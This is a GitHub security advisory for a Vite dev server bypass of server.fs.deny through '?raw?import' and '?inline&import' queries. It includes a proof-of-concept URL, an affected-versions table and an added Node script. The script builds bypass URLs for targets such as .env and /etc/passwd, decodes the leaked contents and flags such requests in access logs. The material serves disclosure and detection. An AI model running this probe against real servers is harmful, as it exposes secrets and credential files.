
GHSA-4r4m-qw57-chr8

GitHub Security Advisory

Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query

GitHub Reviewed | Severity: MODERATE | Has CVE

Advisory Details

### Summary

The contents of arbitrary files can be returned to the browser.

### Impact
Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.

### Details

- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)
- content of non-allowed files is exposed using `?raw?import`

`/@fs/` isn't needed to reproduce the issue for files inside the project root.

### PoC

Original report (check details above for simplified cases):

The `?import&?inline=1.wasm?init` ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice.
```
$ npm create vite@latest
$ cd vite-project/
$ npm install
# Plain `npm run dev` binds to localhost only; the network-exposed case from
# the Impact section is reproduced with: npm run dev -- --host
$ npm run dev
```

Example full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`
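The following is an added example, not code from the advisory, the reporter or the Vite project. It turns the two simplified variants from the Details section and the original report's variant into a small Node 18+ tool: `buildProbeUrls` constructs the request URLs for a target path (inside the project root or, via `/@fs/`, outside it), `extractContent` recovers the leaked file from the served module body, `isBypassProbe`/`findBypassAttempts` flag such requests in access logs of a proxy in front of a dev server, and `probe` runs the live check. Names, the port `5173`, and the log lines are constructed for the example; the response shapes (`export default "<JSON string>"` for `?raw`, `export default "data:<mime>;base64,..."` for `?inline`, possibly nested for the original variant) are assumptions about how Vite serves these modules, not facts stated on this page.

```javascript
// Added example (not advisory or Vite code). Requires Node 18+ for global fetch.
// Assumed response shapes (not stated on the advisory page):
//   ?raw    -> export default "<JSON-encoded file content>"
//   ?inline -> export default "data:<mime>;base64,<payload>"
// The originally reported variant needed two base64 rounds, hence the loop.

const ABSOLUTE_RE = /^(?:\/|[A-Za-z]:\/)/;

// Map a target file to a dev-server path: files inside the project root are
// requested directly, absolute paths outside it need the /@fs/ prefix.
function devServerPath(target) {
  if (ABSOLUTE_RE.test(target)) {
    return "/@fs/" + target.replace(/^\//, "");
  }
  return "/" + target.replace(/^\.?\//, "");
}

// The two simplified bypass variants plus the one from the original report.
function buildProbeUrls(base, target) {
  const p = base.replace(/\/$/, "") + devServerPath(target);
  return {
    raw: `${p}?raw?import`,
    inline: `${p}?inline&import`,
    original: `${p}?import&?inline=1.wasm?init`,
  };
}

// Recover the file content from a served module body, or null if the body
// does not look like a leaked file.
function extractContent(body) {
  const m = /^export default ("(?:[^"\\]|\\.)*")/m.exec(body);
  if (!m) return null;
  let value = JSON.parse(m[1]);
  // Unwrap base64 data: URLs; nested ones are decoded repeatedly (bounded).
  for (let i = 0; i < 4; i++) {
    const d = /^data:[^;,]*;base64,(.*)$/s.exec(value);
    if (!d) break;
    value = Buffer.from(d[1], "base64").toString("utf8");
  }
  return value;
}

// Access-log check: `import` combined with `raw` or `inline` in the query.
// A bare `?import` is normal Vite traffic and is not flagged.
function isBypassProbe(pathWithQuery) {
  const q = pathWithQuery.indexOf("?");
  if (q === -1) return false;
  const tokens = pathWithQuery
    .slice(q + 1)
    .split(/[?&]/)
    .map((t) => t.split("=")[0]);
  return (
    tokens.includes("import") &&
    (tokens.includes("raw") || tokens.includes("inline"))
  );
}

// Extract request paths from combined-log-format lines and keep the suspicious ones.
function findBypassAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = /"(?:GET|HEAD) (\S+) HTTP/.exec(line);
    if (m && isBypassProbe(m[1])) hits.push(m[1]);
  }
  return hits;
}

// Live probe; run it only against a dev server you own.
async function probe(base, target) {
  const results = [];
  for (const [variant, url] of Object.entries(buildProbeUrls(base, target))) {
    const res = await fetch(url);
    const content = res.ok ? extractContent(await res.text()) : null;
    results.push({ variant, url, status: res.status, leaked: content !== null, content });
  }
  return results;
}

// Constructed sample log lines for the offline check (not real traffic).
const SAMPLE_LOG = [
  '10.0.0.5 - - [31/Mar/2025:17:31:00 +0000] "GET /src/main.ts?import HTTP/1.1" 200 512',
  '10.0.0.9 - - [31/Mar/2025:17:31:02 +0000] "GET /.env?raw?import HTTP/1.1" 200 231',
  '10.0.0.9 - - [31/Mar/2025:17:31:03 +0000] "GET /@fs/etc/passwd?inline&import HTTP/1.1" 200 2048',
];

// Usage: node probe.js http://127.0.0.1:5173 /etc/passwd
if (process.argv.length > 2 && typeof fetch === "function") {
  probe(process.argv[2], process.argv[3] || ".env")
    .then((r) => console.log(JSON.stringify(r, null, 2)))
    .catch((e) => console.error(e.message));
} else {
  console.log("suspicious requests in sample log:", findBypassAttempts(SAMPLE_LOG));
}
```

A fixed server answers these URLs with a 403 for denied files, so `leaked: false` on all three variants is the expected result after upgrading; a `true` on the `raw` or `inline` variant is the bypass from the Details section.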

Affected Packages

| Package | Affected versions | Fixed in |
|---|---|---|
| npm `vite` | >= 6.2.0, < 6.2.4 | 6.2.4 |
| npm `vite` | >= 6.1.0, < 6.1.3 | 6.1.3 |
| npm `vite` | >= 6.0.0, < 6.0.13 | 6.0.13 |
| npm `vite` | >= 5.0.0, < 5.4.16 | 5.4.16 |
| npm `vite` | < 4.5.11 | 4.5.11 |

Key Information

GHSA ID: GHSA-4r4m-qw57-chr8
Published: March 31, 2025 5:31 PM
Last Modified: March 31, 2025 11:32 PM
CVSS Score: 5.0 / 10
Primary Ecosystem: npm
Primary Package: vite
GitHub Reviewed: Yes

Dataset

Last updated: September 13, 2025 6:30 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.